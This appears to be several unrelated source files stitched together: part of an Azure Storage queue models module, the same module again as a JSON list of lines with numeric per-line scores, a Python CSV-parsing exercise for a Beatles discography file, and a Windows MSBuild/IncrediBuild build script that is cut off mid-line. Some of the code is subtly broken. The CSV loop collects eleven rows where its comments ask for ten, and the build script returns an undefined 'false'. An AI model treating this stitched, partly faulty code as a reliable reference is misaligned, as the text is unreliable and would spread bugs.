@staticmethod def text_base64encode(data): ''' Base64 encode unicode text. :param str data: String to encode. :return: Base64 encoded string. :rtype: str ''' _validate_message_type_text(data) return b64encode(data.encode('utf-8')).decode('utf-8') @staticmethod def text_base64decode(data): ''' Base64 decode to unicode text. :param str data: String data to decode to unicode. :return: Base64 decoded string. :rtype: str ''' try: return b64decode(data.encode('utf-8')).decode('utf-8') except (ValueError, TypeError): # ValueError for Python 3, TypeError for Python 2 raise ValueError(_ERROR_MESSAGE_NOT_BASE64) @staticmethod def binary_base64encode(data): ''' Base64 encode byte strings. :param str data: Binary string to encode. :return: Base64 encoded data. 
:rtype: str ''' _validate_message_type_bytes(data) return b64encode(data).decode('utf-8') @staticmethod def binary_base64decode(data): ''' Base64 decode to byte string. :param str data: Data to decode to a byte string. :return: Base64 decoded data. :rtype: str ''' try: return b64decode(data.encode('utf-8')) except (ValueError, TypeError): # ValueError for Python 3, TypeError for Python 2 raise ValueError(_ERROR_MESSAGE_NOT_BASE64) @staticmethod def text_xmlencode(data): ''' XML encode unicode text. :param str data: Unicode string to encode :return: XML encoded data. :rtype: str ''' _validate_message_type_text(data) return xml_escape(data) @staticmethod def text_xmldecode(data): ''' XML decode to unicode text. :param str data: Data to decode to unicode. :return: XML decoded data. :rtype: str ''' return xml_unescape(data) @staticmethod def noencode(data): ''' Do no encoding. :param str data: Data. :return: The data passed in is returned unmodified. :rtype: str ''' return data @staticmethod def nodecode(data): ''' Do no decoding. :param str data: Data. :return: The data passed in is returned unmodified. :rtype: str ''' return data class QueuePermissions(object): ''' QueuePermissions class to be used with :func:`~azure.storage.queue.queueservice.QueueService.generate_queue_shared_access_signature` method and for the AccessPolicies used with :func:`~azure.storage.queue.queueservice.QueueService.set_queue_acl`. :ivar QueuePermissions QueuePermissions.READ: Read metadata and properties, including message count. Peek at messages. :ivar QueuePermissions QueuePermissions.ADD: Add messages to the queue. :ivar QueuePermissions QueuePermissions.UPDATE: Update messages in the queue. Note: Use the Process permission with Update so you can first get the message you want to update. :ivar QueuePermissions QueuePermissions.PROCESS: Delete entities. Get and delete messages from the queue. 
''' def __init__(self, read=False, add=False, update=False, process=False, _str=None): ''' :param bool read: Read metadata and properties, including message count. Peek at messages. :param bool add: Add messages to the queue. :param bool update: Update messages in the queue. Note: Use the Process permission with Update so you can first get the message you want to update. :param bool process: Get and delete messages from the queue. :param str _str: A string representing the permissions. ''' if not _str: _str = '' self.read = read or ('r' in _str) self.add = add or ('a' in _str) self.update = update or ('u' in _str) self.process = process or ('p' in _str) def __or__(self, other): return QueuePermissions(_str=str(self) + str(other)) def __add__(self, other): return QueuePermissions(_str=str(self) + str(other)) def __str__(self): return (('r' if self.read else '') + ('a' if self.add else '') + ('u' if self.update else '') + ('p' if self.process else '')) QueuePermissions.READ = QueuePermissions(read=True) QueuePermissions.ADD = QueuePermissions(add=True) QueuePermissions.UPDATE = QueuePermissions(update=True) QueuePermissions.PROCESS = QueuePermissions(process=True)
[ "#-------------------------------------------------------------------------\r\n", "# Copyright (c) Microsoft. All rights reserved.\r\n", "#\r\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n", "# you may not use this file except in compliance with the License.\r\n", "# You may obtain a copy of the License at\r\n", "# http://www.apache.org/licenses/LICENSE-2.0\r\n", "#\r\n", "# Unless required by applicable law or agreed to in writing, software\r\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n", "# See the License for the specific language governing permissions and\r\n", "# limitations under the License.\r\n", "#--------------------------------------------------------------------------\r\n", "from xml.sax.saxutils import escape as xml_escape\r\n", "from xml.sax.saxutils import unescape as xml_unescape\r\n", "from base64 import (\r\n", " b64encode,\r\n", " b64decode,\r\n", ")\r\n", "from ._error import (\r\n", " _validate_message_type_bytes,\r\n", " _validate_message_type_text,\r\n", " _ERROR_MESSAGE_NOT_BASE64,\r\n", ")\r\n", "\r\n", "class Queue(object):\r\n", "\r\n", " ''' \r\n", " Queue class.\r\n", " \r\n", " :ivar str name: \r\n", " The name of the queue.\r\n", " :ivar metadata: \r\n", " A dict containing name-value pairs associated with the queue as metadata.\r\n", " This var is set to None unless the include=metadata param was included \r\n", " for the list queues operation. If this parameter was specified but the \r\n", " queue has no metadata, metadata will be set to an empty dictionary.\r\n", " :vartype metadata: dict mapping str to str\r\n", " '''\r\n", "\r\n", " def __init__(self):\r\n", " self.name = None\r\n", " self.metadata = None\r\n", "\r\n", "\r\n", "class QueueMessage(object):\r\n", " ''' \r\n", " Queue message class. 
\r\n", "\r\n", " :ivar str id: \r\n", " A GUID value assigned to the message by the Queue service that \r\n", " identifies the message in the queue. This value may be used together \r\n", " with the value of pop_receipt to delete a message from the queue after \r\n", " it has been retrieved with the get messages operation. \r\n", " :ivar date insertion_time: \r\n", " A UTC date value representing the time the messages was inserted.\r\n", " :ivar date expiration_time: \r\n", " A UTC date value representing the time the message expires.\r\n", " :ivar int dequeue_count: \r\n", " Begins with a value of 1 the first time the message is dequeued. This \r\n", " value is incremented each time the message is subsequently dequeued.\r\n", " :ivar obj content: \r\n", " The message content. Type is determined by the decode_function set on \r\n", " the service. Default is str.\r\n", " :ivar str pop_receipt: \r\n", " A receipt str which can be used together with the message_id element to \r\n", " delete a message from the queue after it has been retrieved with the get \r\n", " messages operation. Only returned by get messages operations. Set to \r\n", " None for peek messages.\r\n", " :ivar date time_next_visible: \r\n", " A UTC date value representing the time the message will next be visible. \r\n", " Only returned by get messages operations. Set to None for peek messages.\r\n", " '''\r\n", "\r\n", " def __init__(self):\r\n", " self.id = None\r\n", " self.insertion_time = None\r\n", " self.expiration_time = None\r\n", " self.dequeue_count = None\r\n", " self.content = None\r\n", " self.pop_receipt = None\r\n", " self.time_next_visible = None\r\n", "\r\n", "\r\n", "class QueueMessageFormat:\r\n", " ''' \r\n", " Encoding and decoding methods which can be used to modify how the queue service \r\n", " encodes and decodes queue messages. Set these to queueservice.encode_function \r\n", " and queueservice.decode_function to modify the behavior. 
The defaults are \r\n", " text_xmlencode and text_xmldecode, respectively.\r\n", " '''\r\n", "\r\n", " @staticmethod\r\n", " def text_base64encode(data):\r\n", " '''\r\n", " Base64 encode unicode text.\r\n", " \r\n", " :param str data: String to encode.\r\n", " :return: Base64 encoded string.\r\n", " :rtype: str\r\n", " '''\r\n", " _validate_message_type_text(data)\r\n", " return b64encode(data.encode('utf-8')).decode('utf-8')\r\n", " \r\n", " @staticmethod\r\n", " def text_base64decode(data): \r\n", " '''\r\n", " Base64 decode to unicode text.\r\n", " \r\n", " :param str data: String data to decode to unicode.\r\n", " :return: Base64 decoded string.\r\n", " :rtype: str\r\n", " ''' \r\n", " try:\r\n", " return b64decode(data.encode('utf-8')).decode('utf-8')\r\n", " except (ValueError, TypeError):\r\n", " # ValueError for Python 3, TypeError for Python 2\r\n", " raise ValueError(_ERROR_MESSAGE_NOT_BASE64)\r\n", "\r\n", " @staticmethod\r\n", " def binary_base64encode(data):\r\n", " '''\r\n", " Base64 encode byte strings.\r\n", " \r\n", " :param str data: Binary string to encode.\r\n", " :return: Base64 encoded data.\r\n", " :rtype: str\r\n", " '''\r\n", " _validate_message_type_bytes(data)\r\n", " return b64encode(data).decode('utf-8')\r\n", " \r\n", " @staticmethod\r\n", " def binary_base64decode(data):\r\n", " '''\r\n", " Base64 decode to byte string.\r\n", " \r\n", " :param str data: Data to decode to a byte string.\r\n", " :return: Base64 decoded data.\r\n", " :rtype: str\r\n", " ''' \r\n", " try:\r\n", " return b64decode(data.encode('utf-8'))\r\n", " except (ValueError, TypeError):\r\n", " # ValueError for Python 3, TypeError for Python 2\r\n", " raise ValueError(_ERROR_MESSAGE_NOT_BASE64)\r\n", "\r\n", " @staticmethod\r\n", " def text_xmlencode(data):\r\n", " ''' \r\n", " XML encode unicode text.\r\n", "\r\n", " :param str data: Unicode string to encode\r\n", " :return: XML encoded data.\r\n", " :rtype: str\r\n", " '''\r\n", " 
_validate_message_type_text(data)\r\n", " return xml_escape(data)\r\n", " \r\n", " @staticmethod \r\n", " def text_xmldecode(data):\r\n", " ''' \r\n", " XML decode to unicode text.\r\n", "\r\n", " :param str data: Data to decode to unicode.\r\n", " :return: XML decoded data.\r\n", " :rtype: str\r\n", " '''\r\n", " return xml_unescape(data)\r\n", "\r\n", " @staticmethod\r\n", " def noencode(data):\r\n", " ''' \r\n", " Do no encoding. \r\n", "\r\n", " :param str data: Data.\r\n", " :return: The data passed in is returned unmodified.\r\n", " :rtype: str\r\n", " '''\r\n", " return data\r\n", " \r\n", " @staticmethod\r\n", " def nodecode(data):\r\n", " '''\r\n", " Do no decoding.\r\n", " \r\n", " :param str data: Data.\r\n", " :return: The data passed in is returned unmodified.\r\n", " :rtype: str \r\n", " '''\r\n", " return data\r\n", "\r\n", "\r\n", "class QueuePermissions(object):\r\n", "\r\n", " '''\r\n", " QueuePermissions class to be used with :func:`~azure.storage.queue.queueservice.QueueService.generate_queue_shared_access_signature`\r\n", " method and for the AccessPolicies used with :func:`~azure.storage.queue.queueservice.QueueService.set_queue_acl`. \r\n", "\r\n", " :ivar QueuePermissions QueuePermissions.READ: \r\n", " Read metadata and properties, including message count. Peek at messages. \r\n", " :ivar QueuePermissions QueuePermissions.ADD: \r\n", " Add messages to the queue.\r\n", " :ivar QueuePermissions QueuePermissions.UPDATE:\r\n", " Update messages in the queue. Note: Use the Process permission with \r\n", " Update so you can first get the message you want to update.\r\n", " :ivar QueuePermissions QueuePermissions.PROCESS: Delete entities.\r\n", " Get and delete messages from the queue. \r\n", " '''\r\n", " def __init__(self, read=False, add=False, update=False, process=False, _str=None):\r\n", " '''\r\n", " :param bool read:\r\n", " Read metadata and properties, including message count. 
Peek at messages.\r\n", " :param bool add:\r\n", " Add messages to the queue.\r\n", " :param bool update:\r\n", " Update messages in the queue. Note: Use the Process permission with \r\n", " Update so you can first get the message you want to update.\r\n", " :param bool process: \r\n", " Get and delete messages from the queue.\r\n", " :param str _str: \r\n", " A string representing the permissions.\r\n", " '''\r\n", " if not _str:\r\n", " _str = ''\r\n", " self.read = read or ('r' in _str)\r\n", " self.add = add or ('a' in _str)\r\n", " self.update = update or ('u' in _str)\r\n", " self.process = process or ('p' in _str)\r\n", " \r\n", " def __or__(self, other):\r\n", " return QueuePermissions(_str=str(self) + str(other))\r\n", "\r\n", " def __add__(self, other):\r\n", " return QueuePermissions(_str=str(self) + str(other))\r\n", " \r\n", " def __str__(self):\r\n", " return (('r' if self.read else '') +\r\n", " ('a' if self.add else '') +\r\n", " ('u' if self.update else '') +\r\n", " ('p' if self.process else ''))\r\n", "\r\n", "QueuePermissions.READ = QueuePermissions(read=True)\r\n", "QueuePermissions.ADD = QueuePermissions(add=True)\r\n", "QueuePermissions.UPDATE = QueuePermissions(update=True)\r\n", "QueuePermissions.PROCESS = QueuePermissions(process=True)\r\n" ]
[ 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012987012987012988, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0.1, 0, 0.14285714285714285, 0.045454545454545456, 0, 0.045454545454545456, 0.012048192771084338, 0.012345679012345678, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1, 0.037037037037037035, 0, 0.05, 0.0136986301369863, 0.012658227848101266, 0.012345679012345678, 0.015384615384615385, 0.030303030303030304, 0, 0.029411764705882353, 0, 0.03225806451612903, 0.0125, 0, 0.04, 0.0125, 0, 0.034482758620689655, 0.012195121951219513, 0.024096385542168676, 0.012658227848101266, 0, 0.027777777777777776, 0.024096385542168676, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1, 0.023255813953488372, 0.023809523809523808, 0.0125, 0, 0, 0, 0, 0, 0, 0, 0.1, 0, 0, 0, 0, 0, 0, 0.14285714285714285, 0, 0.02702702702702703, 0, 0, 0.1, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1, 0, 0, 0, 0, 0, 0, 0.14285714285714285, 0, 0, 0, 0, 0.1, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0.1111111111111111, 0.05, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0.1, 0, 0, 0, 0, 0.1, 0, 0, 0.034482758620689655, 0, 0, 0, 0, 0, 0, 0, 0.007246376811594203, 0.016666666666666666, 0, 0.019230769230769232, 0.024096385542168676, 0.0196078431372549, 0, 0, 0.01282051282051282, 0, 0, 0.02, 0, 0.011363636363636364, 0, 0, 0.011627906976744186, 0, 0, 0, 0.012195121951219513, 0, 0.03225806451612903, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0.018867924528301886, 0, 0, 0 ]
246
0.01312
false
# Your task is to read the input DATAFILE line by line, and for the first 10 lines (not including the header) # split each line on "," and then for each line, create a dictionary # where the key is the header title of the field, and the value is the value of that field in the row. # The function parse_file should return a list of dictionaries, # each data line in the file being a single list entry. # Field names and values should not contain extra whitespace, like spaces or newline characters. # You can use the Python string method strip() to remove the extra whitespace. # You have to parse only the first 10 data lines in this exercise, # so the returned list should have 10 entries! import os DATADIR = "Lesson_1_Data_Extraction_Fundamentals\\07-Parsing_CSV_Files" DATAFILE = "beatles-diskography.csv" def parse_file(datafile): data = [] with open(datafile, "rb") as f: header = f.readline().strip().split(',') for i, line in enumerate(f): values = line.strip().split(',') item = dict(zip(header, values)) data.append(item) if i > 9: break return data def test(): # a simple test of your implemetation datafile = os.path.join(DATADIR, DATAFILE) d = parse_file(datafile) firstline = {'Title': 'Please Please Me', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '22 March 1963', 'US Chart Position': '-', 'RIAA Certification': 'Platinum', 'BPI Certification': 'Gold'} tenthline = {'Title': '', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '10 July 1964', 'US Chart Position': '-', 'RIAA Certification': '', 'BPI Certification': 'Gold'} assert d[0] == firstline assert d[9] == tenthline test()
[ "# Your task is to read the input DATAFILE line by line, and for the first 10 lines (not including the header)\n", "# split each line on \",\" and then for each line, create a dictionary\n", "# where the key is the header title of the field, and the value is the value of that field in the row.\n", "# The function parse_file should return a list of dictionaries,\n", "# each data line in the file being a single list entry.\n", "# Field names and values should not contain extra whitespace, like spaces or newline characters.\n", "# You can use the Python string method strip() to remove the extra whitespace.\n", "# You have to parse only the first 10 data lines in this exercise,\n", "# so the returned list should have 10 entries!\n", "import os\n", "\n", "DATADIR = \"Lesson_1_Data_Extraction_Fundamentals\\\\07-Parsing_CSV_Files\"\n", "DATAFILE = \"beatles-diskography.csv\"\n", "\n", "\n", "def parse_file(datafile):\n", " data = []\n", " with open(datafile, \"rb\") as f:\n", " header = f.readline().strip().split(',')\n", " for i, line in enumerate(f):\n", " values = line.strip().split(',')\n", " item = dict(zip(header, values))\n", " data.append(item)\n", " if i > 9: break\n", "\n", " return data\n", "\n", "\n", "def test():\n", " # a simple test of your implemetation\n", " datafile = os.path.join(DATADIR, DATAFILE)\n", " d = parse_file(datafile)\n", " firstline = {'Title': 'Please Please Me', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '22 March 1963', 'US Chart Position': '-', 'RIAA Certification': 'Platinum', 'BPI Certification': 'Gold'}\n", " tenthline = {'Title': '', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '10 July 1964', 'US Chart Position': '-', 'RIAA Certification': '', 'BPI Certification': 'Gold'}\n", "\n", " assert d[0] == firstline\n", " assert d[9] == tenthline\n", "\n", " \n", "test()" ]
[ 0.00909090909090909, 0, 0.009708737864077669, 0, 0, 0.010309278350515464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0, 0, 0, 0, 0, 0, 0.004608294930875576, 0.005208333333333333, 0, 0, 0, 0, 0.2, 0.16666666666666666 ]
40
0.011033
false
from importlib import reload as reimport import discord async def reload(cmd, message, args): if not args: cmd.log.info('---------------------------------') cmd.log.info('Reloading all modules...') cmd.bot.ready = False response = discord.Embed(color=0xF9F9F9, title='⚗ Reloading all modules...') load_status = await message.channel.send(embed=response) cmd.bot.init_modules() cmd_count = len(cmd.bot.modules.commands) ev_count = 0 for key in cmd.bot.modules.events: event_group = cmd.bot.modules.events[key] ev_count += len(event_group) load_end_title = f'✅ Loaded {cmd_count} Commands and {ev_count} Events.' load_done_response = discord.Embed(color=0x77B255, title=load_end_title) await load_status.edit(embed=load_done_response) cmd.bot.ready = True cmd.log.info(f'Loaded {cmd_count} commands and {ev_count} events.') cmd.log.info('---------------------------------') else: command_name = ' '.join(args) response = discord.Embed() if command_name not in cmd.bot.modules.commands.keys(): response.colour = 0xBE1931 response.title = f'❗ Command `{command_name}` was not found.' else: module_to_reload = cmd.bot.modules.commands[command_name].command reimport(module_to_reload) response.colour = 0x77B255 response.title = f'✅ Command `{command_name}` was reloaded.' await message.channel.send(embed=response)
[ "from importlib import reload as reimport\n", "\n", "import discord\n", "\n", "\n", "async def reload(cmd, message, args):\n", " if not args:\n", " cmd.log.info('---------------------------------')\n", " cmd.log.info('Reloading all modules...')\n", " cmd.bot.ready = False\n", " response = discord.Embed(color=0xF9F9F9, title='⚗ Reloading all modules...')\n", " load_status = await message.channel.send(embed=response)\n", " cmd.bot.init_modules()\n", " cmd_count = len(cmd.bot.modules.commands)\n", " ev_count = 0\n", " for key in cmd.bot.modules.events:\n", " event_group = cmd.bot.modules.events[key]\n", " ev_count += len(event_group)\n", " load_end_title = f'✅ Loaded {cmd_count} Commands and {ev_count} Events.'\n", " load_done_response = discord.Embed(color=0x77B255, title=load_end_title)\n", " await load_status.edit(embed=load_done_response)\n", " cmd.bot.ready = True\n", " cmd.log.info(f'Loaded {cmd_count} commands and {ev_count} events.')\n", " cmd.log.info('---------------------------------')\n", " else:\n", " command_name = ' '.join(args)\n", " response = discord.Embed()\n", " if command_name not in cmd.bot.modules.commands.keys():\n", " response.colour = 0xBE1931\n", " response.title = f'❗ Command `{command_name}` was not found.'\n", " else:\n", " module_to_reload = cmd.bot.modules.commands[command_name].command\n", " reimport(module_to_reload)\n", " response.colour = 0x77B255\n", " response.title = f'✅ Command `{command_name}` was reloaded.'\n", " await message.channel.send(embed=response)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
36
0.001013
false
#!python3 # -*- coding:utf-8 -*- import os import sys import time import ctypes import shutil import subprocess IsPy3 = sys.version_info[0] >= 3 if IsPy3: import winreg else: import codecs import _winreg as winreg BuildType = 'Release' IsRebuild = True Build = 'Rebuild' Update = False Copy = False CleanAll = False BuildTimeout = 30*60 Bit = 'Win32' Dlllib = 'dll' MSBuild = None IncrediBuild = None UseMSBuild = True #默认用MSBuild编译,如果为False则用IncrediBuild编译 #不同项目只需修改下面5个变量 SlnFile = '../ReadWriteMutex.sln' #相对于本py脚本路径的相对路径 UpdateDir = [] #相对于本py脚本路径的相对路径,填空不更新 ExecBatList = [] #相对于本py脚本路径的相对路径,编译前调用的脚本,可填空,执行bat会先cd到bat目录再执行 MSBuildFirstProjects = [r'ReadWriteMutex'] #使用MSBuild需要工程文件在解决方案sln中的路径 # MSBuild首先编译的项目,填空不指定顺序 IncrediBuildFirstProjects = ['ReadWriteMutex'] #使用IncrediBuild只需工程名字 #IncrediBuild首先编译的项目,填空不指定顺序 class ConsoleColor(): '''This class defines the values of color for printing on console window''' Black = 0 DarkBlue = 1 DarkGreen = 2 DarkCyan = 3 DarkRed = 4 DarkMagenta = 5 DarkYellow = 6 Gray = 7 DarkGray = 8 Blue = 9 Green = 10 Cyan = 11 Red = 12 Magenta = 13 Yellow = 14 White = 15 class Coord(ctypes.Structure): _fields_ = [('X', ctypes.c_short), ('Y', ctypes.c_short)] class SmallRect(ctypes.Structure): _fields_ = [('Left', ctypes.c_short), ('Top', ctypes.c_short), ('Right', ctypes.c_short), ('Bottom', ctypes.c_short), ] class ConsoleScreenBufferInfo(ctypes.Structure): _fields_ = [('dwSize', Coord), ('dwCursorPosition', Coord), ('wAttributes', ctypes.c_uint), ('srWindow', SmallRect), ('dwMaximumWindowSize', Coord), ] class Win32API(): '''Some native methods for python calling''' StdOutputHandle = -11 ConsoleOutputHandle = None DefaultColor = None @staticmethod def SetConsoleColor(color): '''Change the text color on console window''' if not Win32API.DefaultColor: if not Win32API.ConsoleOutputHandle: Win32API.ConsoleOutputHandle = ctypes.windll.kernel32.GetStdHandle(Win32API.StdOutputHandle) bufferInfo = ConsoleScreenBufferInfo() 
ctypes.windll.kernel32.GetConsoleScreenBufferInfo(Win32API.ConsoleOutputHandle, ctypes.byref(bufferInfo)) Win32API.DefaultColor = int(bufferInfo.wAttributes & 0xFF) if IsPy3: sys.stdout.flush() # need flush stdout in python 3 ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, color) @staticmethod def ResetConsoleColor(): '''Reset the default text color on console window''' if IsPy3: sys.stdout.flush() # need flush stdout in python 3 ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, Win32API.DefaultColor) class Logger(): LogFile = '@AutomationLog.txt' LineSep = '\n' @staticmethod def Write(log, consoleColor = -1, writeToFile = True, printToStdout = True): ''' consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen if consoleColor == -1, use default color ''' if printToStdout: isValidColor = (consoleColor >= ConsoleColor.Black and consoleColor <= ConsoleColor.White) if isValidColor: Win32API.SetConsoleColor(consoleColor) try: sys.stdout.write(log) except UnicodeError as e: Win32API.SetConsoleColor(ConsoleColor.Red) isValidColor = True sys.stdout.write(str(type(e)) + ' can\'t print the log!\n') if isValidColor: Win32API.ResetConsoleColor() if not writeToFile: return if IsPy3: logFile = open(Logger.LogFile, 'a+', encoding = 'utf-8') else: logFile = codecs.open(Logger.LogFile, 'a+', 'utf-8') try: logFile.write(log) # logFile.flush() # need flush in python 3, otherwise log won't be saved except Exception as ex: logFile.close() sys.stdout.write('can not write log with exception: {0} {1}'.format(type(ex), ex)) @staticmethod def WriteLine(log, consoleColor = -1, writeToFile = True, printToStdout = True): ''' consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen if consoleColor == -1, use default color ''' Logger.Write(log + Logger.LineSep, consoleColor, writeToFile, printToStdout) @staticmethod def Log(log, consoleColor = -1, writeToFile = True, printToStdout = True): ''' 
consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen if consoleColor == -1, use default color ''' t = time.localtime() log = '{0}-{1:02}-{2:02} {3:02}:{4:02}:{5:02} - {6}{7}'.format(t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec, log, Logger.LineSep) Logger.Write(log, consoleColor, writeToFile, printToStdout) @staticmethod def DeleteLog(): if os.path.exists(Logger.LogFile): os.remove(Logger.LogFile) def GetMSBuildPath(): if Bit == 'Win32': cmd = 'call "%VS120COMNTOOLS%..\\..\\VC\\vcvarsall.bat" x86\nwhere msbuild' elif Bit == 'x64': cmd = 'call "%VS120COMNTOOLS%..\\..\\VC\\vcvarsall.bat" amd64\nwhere msbuild' ftemp = open('GetMSBuildPath.bat', 'wt') ftemp.write(cmd) ftemp.close() p = subprocess.Popen('GetMSBuildPath.bat', stdout = subprocess.PIPE) p.wait() lines = p.stdout.read().decode().splitlines() os.remove('GetMSBuildPath.bat') for line in lines: if 'MSBuild.exe' in line: return line def GetIncrediBuildPath(): try: key=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\Classes\IncrediBuild.MonitorFile\shell\open\command') value, typeId = winreg.QueryValueEx(key, '') if value: start = value.find('"') end = value.find('"', start + 1) path = value[start+1:end] buildConsole = os.path.join(os.path.dirname(path), 'BuildConsole.exe') return buildConsole except FileNotFoundError as e: Logger.WriteLine('can not find IncrediBuild', ConsoleColor.Red) def UpdateCode(): # put git to path first if not shutil.which('git.exe'): Logger.Log('找不到git.exe. 
请确认安装git时将git\bin目录路径加入到环境变量path中!!!\n, 跳过更新代码!!!', ConsoleColor.Yellow) return false oldDir = os.getcwd() for dir in UpdateDir: os.chdir(dir) ret = os.system('git pull') os.chdir(oldDir) if ret != 0: Logger.Log('update {0} failed'.format(dir), ConsoleColor.Yellow) return false return True def BuildProject(cmd): for i in range(6): Logger.WriteLine(cmd, ConsoleColor.Cyan) buildFailed = True startTime = time.time() p = subprocess.Popen(cmd) #IncrediBuild不能使用stdout=subprocess.PIPE,否则会导致p.wait()不返回,可能是IncrediBuild的bug if IsPy3: try: buildFailed = p.wait(BuildTimeout) except subprocess.TimeoutExpired as e: Logger.Log('{0}'.format(e), ConsoleColor.Yellow) p.kill() else: buildFailed = p.wait() if not UseMSBuild: #IncrediBuild的返回值不能说明编译是否成功,需要提取输出判断 fin = open('IncrediBuild.log') for line in fin: if line.startswith('=========='): Logger.Write(line, ConsoleColor.Cyan, writeToFile = True if IsPy3 else False) if IsPy3: start = line.find('失败') + 3 #========== 生成: 成功 1 个,失败 0 个,最新 0 个,跳过 0 个 ========== else:#为了兼容py2做的特殊处理,很恶心 start = 0 n2 = 0 while 1: if line[start].isdigit(): n2 += 1 if n2 == 2: break start = line.find(' ', start) start += 1 end = line.find(' ', start) failCount = int(line[start:end]) buildFailed = failCount > 0 else: Logger.Write(line, ConsoleColor.Red, writeToFile = True if IsPy3 else False, printToStdout = True if ' error ' in line else False) fin.close() costTime = time.time() - startTime Logger.WriteLine('build cost time: {0:.1f}s\n'.format(costTime), ConsoleColor.Green) if not buildFailed: return True return False def BuildAllProjects(): buildSuccess = False cmds = [] if UseMSBuild: if IsRebuild: if CleanAll: cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Debug')) cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Release')) else: cmds.append('{0} {1} /t:Clean 
/p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType)) for project in MSBuildFirstProjects: cmds.append('{0} {1} /t:{2} /p:Configuration={3};platform={4} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, project, BuildType, Bit)) cmds.append('{0} {1} /p:Configuration={2};platform={3} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType, Bit)) else: #IncrediBuild if IsRebuild: if CleanAll: cmds.append('"{0}" {1} /clean /cfg="{2}|{3}" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Debug', Bit)) cmds.append('"{0}" {1} /clean /cfg="{2}|{3}" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Release', Bit)) else: cmds.append('"{0}" {1} /clean /cfg="{2}|{3}" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType, Bit)) for project in IncrediBuildFirstProjects: cmds.append('"{0}" {1} /build /prj={2} /cfg="{3}|{4}" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, project, BuildType, Bit)) cmds.append('"{0}" {1} /build /cfg="{2}|{3}" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType, Bit)) for cmd in cmds: buildSuccess = BuildProject(cmd) if not buildSuccess: break return buildSuccess def main(): if UseMSBuild: if not os.path.exists(MSBuild): Logger.Log('can not find msbuild.exe', ConsoleColor.Red) return 1 else: if not os.path.exists(IncrediBuild): Logger.Log('can not find msbuild.exe', ConsoleColor.Red) return 1 dir = os.path.dirname(__file__) if dir: oldDir = os.getcwd() os.chdir(dir) if Update: if not UpdateCode(): return 1 Logger.Log('git update succeed', ConsoleColor.Green) if Copy: for bat in ExecBatList: oldBatDir = os.getcwd() batDir = os.path.dirname(bat) batName = os.path.basename(bat) if batDir: os.chdir(batDir) start = time.clock() os.system(batName) Logger.Log('run "{}" cost {:.1f} seconds'.format(batName, time.clock() 
- start), ConsoleColor.Green) if batDir: os.chdir(oldBatDir) buildSuccess = BuildAllProjects() if buildSuccess: Logger.Log('build succeed', ConsoleColor.Green) else: Logger.Log('build failed', ConsoleColor.Red) if dir: os.chdir(oldDir) return 0 if buildSuccess else 1 if __name__ == '__main__': Logger.Log('run with argv ' + str(sys.argv), ConsoleColor.Green) sys.argv = [x.lower() for x in sys.argv] start_time = time.time() if 'debug' in sys.argv: BuildType = 'Debug' if 'lib' in sys.argv: Dlllib = 'lib' SlnFile = '../ReadWriteMutex_lib.sln' MSBuildFirstProjects = [r'ReadWriteMutex_lib'] IncrediBuildFirstProjects = ['ReadWriteMutex_lib'] if '64' in sys.argv: Bit = 'x64' if 'build' in sys.argv: IsRebuild = False Build = 'Build' if 'update' in sys.argv: Update = True if 'copy' in sys.argv: Copy = True if 'clean' in sys.argv: CleanAll = True if 'incredibuild' in sys.argv: UseMSBuild = False if UseMSBuild: MSBuild = GetMSBuildPath() if not MSBuild: Logger.Log('can not find MSBuild.exe', 